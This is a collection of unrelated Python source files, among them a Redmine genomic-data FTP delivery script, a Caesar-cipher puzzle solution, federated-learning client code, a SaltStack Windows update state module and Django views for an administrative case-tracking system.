if fasta: fasta_list.append(item) elif fastq: fastq_list.append(item) # Use NAStools to put FASTA and FASTQ files into our working dir. retrieve_nas_files(seqids=fasta_list, outdir=os.path.join(work_dir, str(issue.id)), filetype='fasta', copyflag=True) retrieve_nas_files(seqids=fastq_list, outdir=os.path.join(work_dir, str(issue.id)), filetype='fastq', copyflag=True) # Check that we got all the requested files. missing_fastas = check_fastas_present(fasta_list, os.path.join(work_dir, str(issue.id))) missing_fastqs = check_fastqs_present(fastq_list, os.path.join(work_dir, str(issue.id))) if len(missing_fastqs) > 0: redmine_instance.issue.update(resource_id=issue.id, notes='WARNING: Could not find the following requested FASTQ SEQIDs on' ' the OLC NAS: {}'.format(missing_fastqs)) if len(missing_fastas) > 0: redmine_instance.issue.update(resource_id=issue.id, notes='WARNING: Could not find the following requested FASTA SEQIDs on' ' the OLC NAS: {}'.format(missing_fastas)) # Now make a zip folder that we'll upload to the FTP. shutil.make_archive(root_dir=os.path.join(work_dir, str(issue.id)), format='zip', base_name=os.path.join(work_dir, str(issue.id))) # Now need to login to the FTP to upload the zipped folder. # Lots of FTP issues lately - in the event that upload does not work, a timeout will occur. # Allow for up to 10 attempts at uploading. If upload has completed and we stall at the end, allow. upload_successful = upload_to_ftp(local_file=os.path.join(work_dir, str(issue.id) + '.zip')) # And finally, do some file cleanup. try: shutil.rmtree(os.path.join(work_dir, str(issue.id))) os.remove(os.path.join(work_dir, str(issue.id) + '.zip')) except: pass if upload_successful is False: redmine_instance.issue.update(resource_id=issue.id, status_id=4, notes='There are connection issues with the FTP site. Unable to complete ' 'external retrieve process. Please try again later.') else: redmine_instance.issue.update(resource_id=issue.id, status_id=4, notes='External Retrieve process complete!\n\n' 'Results are available at the following FTP address:\n' 'ftp://ftp.agr.gc.ca/outgoing/cfia-ak/{}'.format(str(issue.id) + '.zip')) except Exception as e: sentry_sdk.capture_exception(e) redmine_instance.issue.update(resource_id=issue.id, notes='Something went wrong! We log this automatically and will look into the ' 'problem and get back to you with a fix soon.') def upload_to_ftp(local_file): """ Since our FTP site has been misbehaving, we now get to have a special FTP uploader that tries to upload multiple times (up to 10). :param local_file: File that you want to upload to the FTP. Will be uploaded with the same name that the local file has. :return: True if upload ended up being successful, False if even after 10 tries the upload didn't work. """ num_upload_attempts = 0 upload_successful = False while num_upload_attempts < 10: # Try uploading - if timeout, check if the upload managed to complete but hang at the end, which happens # sometimes. If it did complete, we're good to go. Otherwise, try again. try: s = ftplib.FTP('ftp.agr.gc.ca', user=FTP_USERNAME, passwd=, timeout=30) s.cwd('outgoing/cfia-ak') f = open(local_file, 'rb') s.storbinary('STOR {}'.format(os.path.split(local_file)[1]), f) f.close() s.quit() upload_successful = True break except socket.timeout: s = ftplib.FTP('ftp.agr.gc.ca', user=FTP_USERNAME, passwd=, timeout=30) s.cwd('outgoing/cfia-ak') uploaded_file_size = s.size(os.path.split(local_file)[1]) s.quit() if uploaded_file_size == os.path.getsize(local_file): upload_successful = True break num_upload_attempts += 1 return upload_successful def check_fastas_present(fasta_list, fasta_dir): missing_fastas = list() for seqid in fasta_list: if len(glob.glob(os.path.join(fasta_dir, seqid + '*.fasta'))) == 0: missing_fastas.append(seqid) return missing_fastas def check_fastqs_present(fastq_list, fastq_dir): missing_fastqs = list() for seqid in fastq_list: if len(glob.glob(os.path.join(fastq_dir, seqid + '*.fastq.gz'))) < 2: missing_fastqs.append(seqid) return missing_fastqs if __name__ == '__main__': externalretrieve_redmine() src/level1/level1.py from string import ascii_lowercase def main(): # Shift characters by 2 positions cipher = ('g fmnc wms bgblr rpylqjyrc gr zw fylb. rfyrq ufyr amknsrcpq ypc ' 'dmp. bmgle gr gl zw fylb gq glcddgagclr ylb rfyr\'q ufw rfgq rcv' 'r gq qm jmle. sqgle qrpgle.kyicrpylq() gq pcamkkclbcb. lmu ynnjw' ' ml rfc spj.') url = 'map' translation = str.maketrans(ascii_lowercase, ascii_lowercase[2:] + ascii_lowercase[:2]) message = cipher.translate(translation) answer = url.translate(translation) print(message) print("Answer: " + answer) if __name__ == '__main__': main() import unittest from augment.augmentors.translation.translation_augmentor import TranslationAugmentor from augment.augmentors.noise.noise_augmentor import NoiseAugmentor class TestAugmentors(unittest.TestCase): def test_translation_augmentor(self): original_sample = "A man inspects the uniform of a figure in some East Asian country." expected_augmented_sample = "A man inspects the uniform of a figure in an eastern Asian country." actual_augmentated_samples = TranslationAugmentor().try_augmentation_on_string(original_sample) self.assertIn(expected_augmented_sample, actual_augmentated_samples) def test_noise_augmentor(self): original_sample = "A man inspects the uniform of a figure in some East Asian country." expected_augmented_sample = "Actually a man inspects the uniform of a figure in some East Asian country." actual_augmentated_samples = NoiseAugmentor().try_augmentation_on_string(original_sample) self.assertIn(expected_augmented_sample, actual_augmentated_samples) molo/surveys/migrations/0020_formfield_admin_label.py # -*- coding: utf-8 -*- # Generated by Django 1.9.13 on 2017-11-16 16:11 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('surveys', '0019_segmentusergroup'), ] operations = [ migrations.AddField( model_name='molosurveyformfield', name='admin_label', field=models.CharField(default=b'', help_text='Column header used during CSV export of survey responses.', max_length=256), ), migrations.AddField( model_name='personalisablesurveyformfield', name='admin_label', field=models.CharField(default=b'', help_text='Column header used during CSV export of survey responses.', max_length=256), ), ] 1-10 from typing import List from pddiansm.mapper.DefaultMapper import DefaultMapper from pddiansm.mapper.IMapper import IMapper from pddiansm.thesaurus.IThesaurusEntriesFound import IThesaurusEntriesFound from pddiansm.thesaurus.ThesaurusEntriesCollapsed import ThesaurusEntriesCollapsed class ISearchThesEntries: """ This class searches thesaurus entries (substances or drug classes") before searching PDDI """ def __init__(self): self.mapper = DefaultMapper() def search_moc(self, moc: str) -> IThesaurusEntriesFound: """ :param moc: a molecule or drug_class :return: thesaurus entries containing a list of substances and drug classes to search for PDDIs """ pass def search_string(self, string: str) -> IThesaurusEntriesFound: """ :param string: any string that could be map to substance(s) or drug_class(es) with a IMapper :return: thesaurus entries containing a list of substances and drug classes to search for PDDIs """ mocs: List[str] = self.mapper.get_mocs_mapped(string) return self.search_mocs(mocs, string) def set_mapper(self, mapper: IMapper): self.mapper = mapper def search_mocs(self, mocs: List[str], string: str) -> IThesaurusEntriesFound: muliple_thesaurus_entries: List[IThesaurusEntriesFound] = [self.search_moc(moc) for moc in mocs] thesaurus_entries_collapsed: ThesaurusEntriesCollapsed = ThesaurusEntriesCollapsed(string, muliple_thesaurus_entries) return thesaurus_entries_collapsed refactormachine/neuralocalize import numpy as np import traceback import feature_extraction as feature_extraction from utils.cifti_utils import load_cifti_brain_data_from_file from utils.utils import Subject method_to_nii = [ (feature_extraction.run_group_ica_separately, 'nii_path'), (feature_extraction.run_group_ica_together, 'nii_path'), (feature_extraction.run_dual_regression, 'nii_path'), (feature_extraction.get_subcortical_parcellation, 'nii_path'), (feature_extraction.set_correlation_coefficients, 'nii_path'), ] def abstract_test(method_to_test, nii_path): """Test pattern for the module: runs the method and checks that the result is the same. :param method_to_test: The method we wish to test :param nii_path: The path holding the expected matlab matrix. """ actual_output = method_to_test() # todo(kess) Ask Noam how to integrate with her tests. def run_get_subcortical_parcellation_test(): cifti_image, brain_models = load_cifti_brain_data_from_file( r'..\test_resources\GROUP_PCA_rand200_RFMRI.dtseries.nii') abstract_test( # TODO this path is not in the git. Should be added into resources lambda: feature_extraction.get_subcortical_parcellation(cifti_image, brain_models), r'..\..\matlab_results\SC_clusters.dtseries.nii') def run_group_ica_separately_test(): cifti_image, brain_models = load_cifti_brain_data_from_file( r'..\test_resources\GROUP_PCA_rand200_RFMRI.dtseries.nii') abstract_test( lambda: feature_extraction.run_group_ica_separately(cifti_image, brain_models) , r'..\..\matlab_results\ica_LR_MATCHED.dtseries.nii') def run_group_ica_together_test(): cifti_image, brain_models = load_cifti_brain_data_from_file( r'..\test_resources\GROUP_PCA_rand200_RFMRI.dtseries.nii') abstract_test( lambda: feature_extraction.run_group_ica_together(cifti_image, brain_models) , r'..\..\matlab_results\ica_both_lowdim.dtseries.nii') def set_correlation_coefficients_test(): sc_cifti_image, _ = load_cifti_brain_data_from_file( r'..\test_resources\SC_clusters.dtseries.nii') # sc_cifti_image = np.ones([2, 4]) # TODO(loya) validate these are the actual files. subjects = [Subject('noam', left_right_hemisphere_data_path=r'..\test_resources\100307_DR2_nosmoothing.dtseries.nii', sessions_nii_paths=[ r'..\test_resources\rfMRI_REST1_LR\rfMRI_REST1_LR_Atlas_hp2000_clean.dtseries.nii', r'..\test_resources\rfMRI_REST1_RL\rfMRI_REST1_RL_Atlas_hp2000_clean.dtseries.nii', r'..\test_resources\rfMRI_REST2_LR\rfMRI_REST2_LR_Atlas_hp2000_clean.dtseries.nii', r'..\test_resources\rfMRI_REST2_RL\rfMRI_REST2_RL_Atlas_hp2000_clean.dtseries.nii'])] # subjects[0].left_right_hemisphere_data = np.ones([4, 4]) # for session in subjects[0].sessions: # as_line = np.arange(6*4) / 1000 # session.cifti = np.reshape(as_line, [6, 4]) # print("session.cifti:", session.cifti) feature_extraction.set_correlation_coefficients(sc_cifti_image.transpose(), subjects) ret = subjects[0].correlation_coefficient actual_output, _ = load_cifti_brain_data_from_file(r'..\test_resources\noam_results\100307_RFMRI_nosmoothing.dtseries.nii') print("Diff norm:", np.linalg.norm(ret - actual_output)) print("RET shape:", ret.shape, "actual shape:", actual_output.shape) print("RESULT:", np.allclose(actual_output, ret)) def run_dual_regression_test(): dt, brain_models = load_cifti_brain_data_from_file( r'..\test_resources\ica_LR_MATCHED.dtseries.nii') # TODO(loya) notice there are more parameters such as ROIs subjects = [Subject( 'noam', sessions_nii_paths=[ r'..\test_resources\Subjects\100307\MNINonLinear\Results\rfMRI_REST1_LR\rfMRI_REST1_LR_Atlas_hp2000_clean.dtseries.nii', r'..\test_resources\Subjects\100307\MNINonLinear\Results\rfMRI_REST1_RL\rfMRI_REST1_RL_Atlas_hp2000_clean.dtseries.nii', r'..\test_resources\Subjects\100307\MNINonLinear\Results\rfMRI_REST2_LR\rfMRI_REST2_LR_Atlas_hp2000_clean.dtseries.nii', r'..\test_resources\Subjects\100307\MNINonLinear\Results\rfMRI_REST2_RL\rfMRI_REST2_RL_Atlas_hp2000_clean.dtseries.nii' ])] # TODO(loya) this is out of date. The test doesn't return value, but updates the .left_right... field in subjects. feature_extraction.run_dual_regression(dt.transpose(), brain_models, subjects) print(subjects[0].left_right_hemisphere_data) # abstract_test( # lambda: feature_extraction.run_dual_regression(dt.transpose(), brain_models, subjects) # , r'..\test_resources\100307_DR2_nosmoothing.dtseries.nii') # try: # run_group_ica_together_test() # except Exception: # traceback.print_exc() # try: # run_group_ica_separately_test() # except Exception: # traceback.print_exc() # try: # set_correlation_coefficients_test() # except Exception: # traceback.print_exc() # try: # run_get_subcortical_parcellation_test() # except Exception: # traceback.print_exc() # run_dual_regression_test() run_dual_regression_test()""" Created on 12 Aug 2016 @author: () """ # -------------------------------------------------------------------------------------------------------------------- class LockTimeout(RuntimeError): """ classdocs """ def __init__(self, name, ident): """ Constructor """ self.__name = name self.__ident = ident # ---------------------------------------------------------------------------------------------------------------- @property def name(self): return self.__name @property def ident(self): return self.__ident # ---------------------------------------------------------------------------------------------------------------- def __str__(self, *args, **kwargs): return "LockTimeout:{name:%s, ident:%s}" % (self.name, self.ident) import tensorflow as tf import numpy as np from collections import namedtuple import math from Model import AlexNet from Dataset import Dataset import random from VGG import vgg_net # FedModel 定义包含属性 x,y,drop_rate,train_op,loss_op,acc_op等属性 FedModel = namedtuple('FedModel', 'X Y DROP_RATE train_op loss_op acc_op') #联邦模型客户端类 class Clients: def __init__(self, input_shape, num_classes, learning_rate, clients_num): self.graph = tf.Graph() self.sess = tf.Session(graph=self.graph) # 创建alxnet网络 net = AlexNet(input_shape, num_classes, learning_rate, self.graph) #net = vgg_net(input_shape, num_classes, learning_rate, self.graph) self.model = FedModel(*net) # 初始化 with self.graph.as_default(): self.sess.run(tf.global_variables_initializer()) # 装载数据 # 根据训练客户端数量划分数据集 self.dataset = Dataset(tf.keras.datasets.cifar10.load_data,split=clients_num) #self.dataset = Dataset(tf.keras.datasets.mnist.load_data,split=clients_num) #测试模型准确率 def run_test(self, num, save=False): with self.graph.as_default(): batch_x, batch_y = self.dataset.test.next_batch(num) #替代计算图中的x,y等数据 feed_dict = { self.model.X: batch_x, self.model.Y: batch_y, self.model.DROP_RATE: 0 } return self.sess.run([self.model.acc_op, self.model.loss_op], feed_dict=feed_dict) def train_epoch(self, cid, batch_size=256, dropout_rate=0.7): dataset = self.dataset.train[cid] with self.graph.as_default(): for _ in range(math.ceil(dataset.size // batch_size)): #for _ in range(1): batch_x, batch_y = dataset.next_batch(batch_size) batch_x = data_augmentation(batch_x,batch_y) #做数据增强处理 feed_dict = { self.model.X: batch_x, self.model.Y: batch_y, self.model.DROP_RATE: dropout_rate } self.sess.run(self.model.train_op, feed_dict=feed_dict) #返回计算图中所有可训练的变量值 def get_client_vars(self): """ Return all of the variables list """ with self.graph.as_default(): client_vars = self.sess.run(tf.trainable_variables()) return client_vars def set_global_vars(self, global_vars): with self.graph.as_default(): all_vars = tf.trainable_variables()#获取所有可训练变量 for variable, value in zip(all_vars, global_vars): variable.load(value, self.sess)#加载server端发送的var到模型上 #随机返回ratio比例的客户端并返回编号 def choose_clients(self, ratio=1.0): client_num = self.get_clients_num() choose_num = math.floor(client_num * ratio) return np.random.permutation(client_num)[:choose_num] def get_clients_num(self): #返回客户端的数量 return len(self.dataset.train) #数据增强 def _random_crop(batch, crop_shape, padding=None): oshape = np.shape(batch[0]) if padding: oshape = (oshape[0] + 2*padding, oshape[1] + 2*padding) new_batch = [] npad = ((padding, padding), (padding, padding), (0, 0)) for i in range(len(batch)): new_batch.append(batch[i]) if padding: new_batch[i] = np.lib.pad(batch[i], pad_width=npad, mode='constant', constant_values=0) nh = random.randint(0, oshape[0] - crop_shape[0]) nw = random.randint(0, oshape[1] - crop_shape[1]) new_batch[i] = new_batch[i][nh:nh + crop_shape[0], nw:nw + crop_shape[1]] return new_batch def _random_flip_leftright(batch,batch_y): for i in range(len(batch)): ''' filpped_le_re=tf.image.random_flip_left_right(batch_x[i]) #随机左右翻转 print(type(filpped_le_re)) np.concatenate(batch_x,filpped_le_re) batch_x.append(filpped_le_re) batch_y.append(batch_y[i]) filpped_up_down=tf.image.random_flip_up_down(batch_x[i]) #随机上下翻转 batch_x.append(filpped_up_down) batch_y.append(batch_y[i]) # 随机设置图片的对比度 image = tf.image.random_contrast(image, lower=0.5, upper=1.5) batch_x.append(image) batch_y.append(batch_y[i]) # 随机设置图片的色度 image2 = tf.image.random_hue(image, max_delta=0.3) batch_x.append(image2) batch_y.append(batch_y[i]) adjust=tf.image.random_brightness(filpped_up_down,0.4) batch_x.append(adjust) batch_y.append(batch_y[i]) ''' if bool(random.getrandbits(1)): batch[i] = np.fliplr(batch[i]) return batch def data_augmentation(batch_x,batch_y): batch= _random_flip_leftright(batch_x,batch_y) batch = _random_crop(batch, [32, 32], 4) return batch import torch import pandas as pd from graph import Graph, Node # https://graphsandnetworks.com/the-cora-dataset/ def read_cora(path): g = Graph() contents = pd.read_csv(f'{path}/cora.content', delimiter='\t', header=None) cites = pd.read_csv(f'{path}/cora.cites', delimiter='\t') indexes = contents.iloc[:, 0].values index_dict = {v: i for i, v in enumerate(indexes)} features = contents.iloc[:, 1:-1].values print(features.shape, features.max(axis=0)) #--> (2708, 1433) for idx, i in index_dict.items(): #print(idx, i) g.add(Node(i, idx)) labels = contents.iloc[:, -1] label_dict = {v: i for i, v in enumerate(labels.unique())} labels = labels.apply(label_dict.get).values #print(labels, labels.shape, labels.max()) --> [0 1 2 ... 5 6 0] (2708,) 6 edges = cites.values for n1, n2 in edges: g[index_dict[n1]].add_neighbor(g[index_dict[n2]]) g[index_dict[n2]].add_neighbor(g[index_dict[n1]]) features, labels = torch.FloatTensor(features), torch.LongTensor(labels) return g, features, labels, len(label_dict) def split_data(g, features, labels, splits): s0, s1, s2 = splits[0], splits[0] + splits[1], splits[0] + splits[1] + splits[2] train_g, train_features, train_labels = g.split_graph(0, s0), features[:s0], labels[:s0] valid_g, valid_features, valid_labels = g.split_graph(s0, s1), features[s0:s1], labels[s0:s1] test_g, test_features, test_labels = g.split_graph(s1, s2), features[s1:s2], labels[s1:s2] train_g.finalize(), valid_g.finalize(), test_g.finalize() return (train_g, train_features, train_labels), \ (valid_g, valid_features, valid_labels), \ (test_g, test_features, test_labels) if __name__ == "__main__": g, features, labels, n_classes = read_cora('cora')# -*- coding:utf-8 -*- from ais_sdk.moderation_text import moderation_text_aksk from ais_sdk.utils import init_global_env if __name__ == '__main__': # # access moderation text enhance,posy data by ak,sk # app_key = '*************' app_secret = '************' init_global_env(region='cn-north-1') # call interface use the text result = moderation_text_aksk(app_key, app_secret, '', 'content') print resultmarkgras/salt """ Microsoft Updates (KB) Management This module provides the ability to enforce KB installations from files (.msu), without WSUS or Windows Update .. versionadded:: 2018.3.4 """ import logging import salt.utils.platform import salt.utils.url from salt.exceptions import CommandExecutionError, SaltInvocationError log = logging.getLogger(__name__) # Define the module's virtual name __virtualname__ = "wusa" def __virtual__(): """ Load only on Windows """ if not salt.utils.platform.is_windows(): return False, "Only available on Windows systems" return __virtualname__ def installed(name, source): """ Ensure an update is installed on the minion Args: name(str): Name of the Windows KB ("KB123456") source (str): Source of .msu file corresponding to the KB Example: .. code-block:: yaml KB123456: wusa.installed: - source: salt://kb123456.msu """ ret = {"name": name, "changes": {}, "result": False, "comment": ""} # Input validation if not name: raise SaltInvocationError('Must specify a KB "name"') if not source: raise SaltInvocationError('Must specify a "source" file to install') # Is the KB already installed if __salt__["wusa.is_installed"](name): ret["result"] = True ret["comment"] = "{} already installed".format(name) return ret # Check for test=True if __opts__["test"] is True: ret["result"] = None ret["comment"] = "{} would be installed".format(name) ret["result"] = None return ret # Cache the file cached_source_path = __salt__["cp.cache_file"](path=source, saltenv=__env__) if not cached_source_path: msg = 'Unable to cache {} from saltenv "{}"'.format( salt.utils.url.redact_http_basic_auth(source), __env__ ) ret["comment"] = msg return ret # Install the KB additional_comment = "" try: __salt__["wusa.install"](cached_source_path) except CommandExecutionError as exc: additional_comment = exc.message # Verify successful install if __salt__["wusa.is_installed"](name): ret["comment"] = "{} was installed. {}".format(name, additional_comment) ret["changes"] = {"old": False, "new": True} ret["result"] = True else: ret["comment"] = "{} failed to install. {}".format(name, additional_comment) return ret def uninstalled(name): """ Ensure an update is uninstalled from the minion Args: name(str): Name of the Windows KB ("KB123456") Example: .. code-block:: yaml KB123456: wusa.uninstalled """ ret = {"name": name, "changes": {}, "result": False, "comment": ""} # Is the KB already uninstalled if not __salt__["wusa.is_installed"](name): ret["result"] = True ret["comment"] = "{} already uninstalled".format(name) return ret # Check for test=True if __opts__["test"] is True: ret["result"] = None ret["comment"] = "{} would be uninstalled".format(name) ret["result"] = None return ret # Uninstall the KB __salt__["wusa.uninstall"](name) # Verify successful uninstall if not __salt__["wusa.is_installed"](name): ret["comment"] = "{} was uninstalled".format(name) ret["changes"] = {"old": True, "new": False} ret["result"] = True else: ret["comment"] = "{} failed to uninstall".format(name) return ret # -*- coding: utf-8 -*- from core.permissions import ( GRUPO_ADMINISTRATIVO, GRUPO_SUPERIOR_ADMINISTRATIVO, PERMISSOES_ADMINISTRATIVO, PermissionView, SelectUserOrgaoExternoView, SelectUserPermissionView, padrao_check_permissions, verifica_direcao ) from core.validators import ALLOWED_EXTENSIONS, MAX_FILE_SIZE from core.views import ( DespachoMixin, GravacaoMidiaMixin, OfExternoMixin, OfInternoMixin, OrgaoPermissionRequiredMixin, ProcessosAjaxDatatableView, ProcessosListView, VincularProcessosCreateMixin ) from django.contrib import messages from django.contrib.auth.mixins import LoginRequiredMixin from django.contrib.messages.views import SuccessMessageMixin from django.core.exceptions import PermissionDenied from django.db import transaction from django.http import HttpResponseRedirect from django.shortcuts import get_object_or_404, redirect from django.urls import reverse, reverse_lazy from django.utils import timezone from django.views.generic import CreateView, DetailView, UpdateView from easy_pdf.views import PDFTemplateResponseMixin from guardian.mixins import PermissionRequiredMixin from .forms import ( AdministrativoForm, AdministrativoUpdateForm, ControlEmpresasForm, DespachoAdmForm, DocumentoAdmForm, MidiaAdmForm, OfEmpresasFormset, OfEmpresasUpdateForm, OficioExternoAdmForm, OficioInternoAdmForm, OfInternoAdmUpdateForm, StatusAdmForm ) from .models import ( Administrativo, AtoAdm, ControlEmpresas, DespachoAdm, DocumentosGeraisAdm, MidiaAdm, OfEmpresas, OficioExternoAdm, OficioInternoAdm, StatusAdm ) class AdministrativoCreateView(LoginRequiredMixin, OrgaoPermissionRequiredMixin, SuccessMessageMixin, CreateView): model = Administrativo form_class = AdministrativoForm orgao_permission_required = 'account.access_ADMINISTRATIVO' view_permission_required = 'adm.add_administrativo' template_name = 'componentes/shares/FormsCriarProcedimento.html' success_message = "Procedimento criado com sucesso" def get(self, request, *args, **kwargs): user_has_perm = self.request.user.has_perm(self.view_permission_required) user_has_authority = verifica_direcao(request, GRUPO_SUPERIOR_ADMINISTRATIVO) if user_has_perm or user_has_authority: return super(AdministrativoCreateView, self).get(request, *args, **kwargs) else: raise PermissionDenied def get_context_data(self, **kwargs): context = super(AdministrativoCreateView, self).get_context_data(**kwargs) context['title_header'] = 'Cadastrar Processo' context['form_adm'] = True return context def form_valid(self, form): user = self.request.user form.instance.autor = user form.instance.orgao_processo = user.profile.orgao_link form.instance.gerar_numero_processo() return super(AdministrativoCreateView, self).form_valid(form) def get_success_url(self): return reverse_lazy('adm:detalhe_processo_adm', kwargs={'pk': self.object.pk}) criar_processo_adm = AdministrativoCreateView.as_view() class AdministrativoUpdateView(LoginRequiredMixin, OrgaoPermissionRequiredMixin, SuccessMessageMixin, UpdateView): model = Administrativo form_class = AdministrativoUpdateForm orgao_permission_required = 'account.access_ADMINISTRATIVO' view_permission_required = 'adm.change_administrativo' template_name = 'componentes/shares/FormsCriarProcedimento.html' success_message = "Procedimento atualizado com sucesso" def get(self, request, *args, **kwargs): obj = get_object_or_404(Administrativo, pk=self.kwargs['pk']) user_has_perm = self.request.user.has_perm(self.view_permission_required, obj) user_has_authority = verifica_direcao(request, GRUPO_SUPERIOR_ADMINISTRATIVO) if user_has_perm or user_has_authority: return super(AdministrativoUpdateView, self).get(request, *args, **kwargs) else: raise PermissionDenied def get_context_data(self, **kwargs): context = super(AdministrativoUpdateView, self).get_context_data(**kwargs) context['title_header'] = 'Editar Processo' context['form_adm'] = True return context def form_valid(self, form): arquivar = form.cleaned_data.get('arquivar') with transaction.atomic(): if arquivar is True: form.instance.arquivador = self.request.user form.instance.data_arquivamento = timezone.now() form.instance.modificador = self.request.user return super(AdministrativoUpdateView, self).form_valid(form) def get_success_url(self): return reverse_lazy('adm:detalhe_processo_adm', kwargs={'pk': self.object.pk}) editar_processo_adm = AdministrativoUpdateView.as_view() class AdministrativoListView(ProcessosListView): orgao_permission_required = 'account.access_ADMINISTRATIVO' view_permission_required = 'adm.view_administrativo' url_cadastrar = reverse_lazy('adm:criar_processo_adm') url_processos_ajax = reverse_lazy('adm:processos_adm_ajax') listar_adm = AdministrativoListView.as_view() class AdministrativoAjaxDatatableView(ProcessosAjaxDatatableView): model = Administrativo title = 'Administrativo' initial_order = [["criacao", "desc"], ] search_values_separator = '+' show_column_filters = False length_menu = [[25, 50, 100, 300], [25, 50, 100, 300]] processo_permission_required = ['adm.view_administrativo', 'adm.add_administrativo', 'adm.change_administrativo'] orgao_permission_required = 'account.access_ADMINISTRATIVO' disable_queryset_optimization = True column_defs = [ ProcessosAjaxDatatableView.render_row_tools_column_def(), {'name': 'id', 'visible': False, 'searchable': False, 'orderable': False}, {'name': 'observacao', 'visible': False, 'searchable': True}, {'name': 'criacao', 'title': 'Criação'}, {'name': 'numero_processo', 'title': 'Processo'}, {'name': 'oficiante', }, {'name': 'destino_adm', 'max_length': 40}, { 'name': 'assunto_adm', 'title': 'Assunto', 'foreign_field': 'assunto_adm__assunto', 'max_length': 40 }, {'name': 'outro', 'visible': False, 'searchable': True}, {'name': 'sigla', 'title': 'Criado por', 'foreign_field': 'orgao_processo__sigla'}, { 'name': 'acessar', 'title': (''), 'searchable': False, 'orderable': False, 'className': 'text-center' }, ] def customize_row(self, row, obj): processo_externo = ' processo-externo' if obj.orgao_processo != self.request.user.profile.orgao_link else '' arquivado = ' arquivado' if obj.arquivar else '' row['acessar'] = f""" Ver Processo """ row['assunto_adm'] = obj.get_assunto() def render_row_details(self, pk, request=None): obj = self.model.objects.get(pk=pk) return f"""

    Observação: {obj.observacao}

    """ processos_adm_ajax = AdministrativoAjaxDatatableView.as_view() class AdministrativoDetailView(PermissionRequiredMixin, OrgaoPermissionRequiredMixin, DetailView): model = Administrativo context_object_name = 'processo_adm' template_name = 'componentes/singles/processos/adm/detalhes/_DetalheGeral.html' permission_required = 'adm.view_administrativo' orgao_permission_required = 'account.access_ADMINISTRATIVO' raise_exception = True grupo_superior = GRUPO_SUPERIOR_ADMINISTRATIVO def get_context_data(self, **kwargs): context = super(AdministrativoDetailView, self).get_context_data(**kwargs) context['atos'] = self.object.get_all_atos() context['is_coordenador'] = verifica_direcao(self.request, GRUPO_SUPERIOR_ADMINISTRATIVO) context['anulacao_baseurl'] = reverse('adm:anular_ato', kwargs={'pk': '0'}) return context def check_permissions(self, request): padrao_check_permissions(self, request) detalhe_processo_adm = AdministrativoDetailView.as_view() class AdmExtratoPdfView(PDFTemplateResponseMixin, LoginRequiredMixin, OrgaoPermissionRequiredMixin, DetailView): model = Administrativo template_name = 'componentes/singles/processos/adm/ExtratoPdf.html' context_object_name = 'processo_adm' orgao_permission_required = 'account.access_ADMINISTRATIVO' view_permission_required = 'adm.view_administrativo' def get_context_data(self, **kwargs): context = super(AdmExtratoPdfView, self).get_context_data(**kwargs) context['atos'] = self.object.get_all_atos() return context extrato_pdf_adm = AdmExtratoPdfView.as_view() class AtoAdmCreateView(LoginRequiredMixin, OrgaoPermissionRequiredMixin, CreateView): orgao_permission_required = 'account.access_ADMINISTRATIVO' view_permission_required = 'adm.add_administrativo' ato_create_view = True processo_model = Administrativo def get(self, request, *args, **kwargs): obj = get_object_or_404(Administrativo, pk=self.kwargs['pk']) user_has_perm = self.request.user.has_perm(self.view_permission_required, obj) user_has_authority = verifica_direcao(request, GRUPO_SUPERIOR_ADMINISTRATIVO) if user_has_perm or user_has_authority: if obj.arquivar is False: return super(AtoAdmCreateView, self).get(request, *args, **kwargs) else: return redirect('core:arquivado') else: raise PermissionDenied def set_instance_form(self, form): form.instance.autor = self.request.user form.instance.processo = Administrativo.objects.get(pk=self.kwargs['pk']) form.instance.tipo_ato = self.kwargs['tipo_ato'] def get_success_url(self): return reverse_lazy('notifier:ato_adm', kwargs={'model_pk': self.object.pk}) class AtoAdmUpdateView(OrgaoPermissionRequiredMixin, UpdateView): orgao_permission_required = 'account.access_ADMINISTRATIVO' view_permission_required = 'adm.change_administrativo' ato_update_view = True def get(self, request, *args, **kwargs): obj = get_object_or_404(self.model, pk=self.kwargs['pk']) user_has_perm = self.request.user.has_perm(self.view_permission_required, obj.processo) user_has_authority = verifica_direcao(request, GRUPO_SUPERIOR_ADMINISTRATIVO) if user_has_perm or user_has_authority: if obj.processo.arquivar is False: return super(AtoAdmUpdateView, self).get(request, *args, **kwargs) else: return redirect('core:arquivado') else: raise PermissionDenied class OfInternoCreateView(OfInternoMixin, AtoAdmCreateView): model = OficioInternoAdm form_class = OficioInternoAdmForm processo_class = Administrativo outros_disabled = True subtitle = 'Expedir Ofício' processos_css = False def form_valid(self, form): self.set_instance_form(form) return super(OfInternoCreateView, self).form_valid(form) add_ofinterno_adm = OfInternoCreateView.as_view() class OfInternoUpdateView(LoginRequiredMixin, OfInternoMixin, AtoAdmUpdateView): model = OficioInternoAdm form_class = OfInternoAdmUpdateForm processo_class = Administrativo of_interno_update = True outros_disabled = False subtitle = 'Modificar Ofício Expedido' processos_css = True def form_valid(self, form): data = {x: valor for x, valor in form.cleaned_data.items() if valor is not None and valor is not False and valor != ''} data['modificador'] = self.request.user data['autoridade'] = str(data['autoridade']) OficioInternoAdm.objects.filter(pk=self.kwargs['pk']).update(**data) return HttpResponseRedirect(self.get_success_url()) def get_success_url(self): return reverse_lazy('notifier:ato_adm', kwargs={'model_pk': self.object.pk}) editar_ofinterno_adm = OfInternoUpdateView.as_view() class OfInternoArquivoUpdateView(LoginRequiredMixin, AtoAdmUpdateView): model = OficioInternoAdm fields = ['arquivo'] template_name = 'componentes/shares/DadosPopup.html' def get_context_data(self, **kwargs): context = super(OfInternoArquivoUpdateView, self).get_context_data(**kwargs) context['max_size'] = MAX_FILE_SIZE context['allowed_extensions'] = ALLOWED_EXTENSIONS return context def form_valid(self, form): form.instance.modificador = self.request.user self.object = form.save() return super(OfInternoArquivoUpdateView, self).form_valid(form) def get_success_url(self): return reverse_lazy('notifier:ato_adm', kwargs={'model_pk': self.object.pk}) editar_ofinterno_arq_adm = OfInternoArquivoUpdateView.as_view() class OfInternoAdmConfirmView(LoginRequiredMixin, AtoAdmUpdateView): model = OficioInternoAdm fields = ['confirmacao', 'nome_confirm'] template_name = 'componentes/shares/ConfirmacaoPopup.html' def form_valid(self, form): form.instance.modificador = self.request.user return super(OfInternoAdmConfirmView, self).form_valid(form) def get_success_url(self): return reverse_lazy('notifier:ato_adm', kwargs={'model_pk': self.object.pk}) editar_confirmacao_adm = OfInternoAdmConfirmView.as_view() class OfInternoAdmDataEnvioView(LoginRequiredMixin, AtoAdmUpdateView): model = OficioInternoAdm fields = ['data_envio'] template_name = 'componentes/shares/DataEnvioPopup.html' def form_valid(self, form): form.instance.modificador = self.request.user self.object = form.save() return 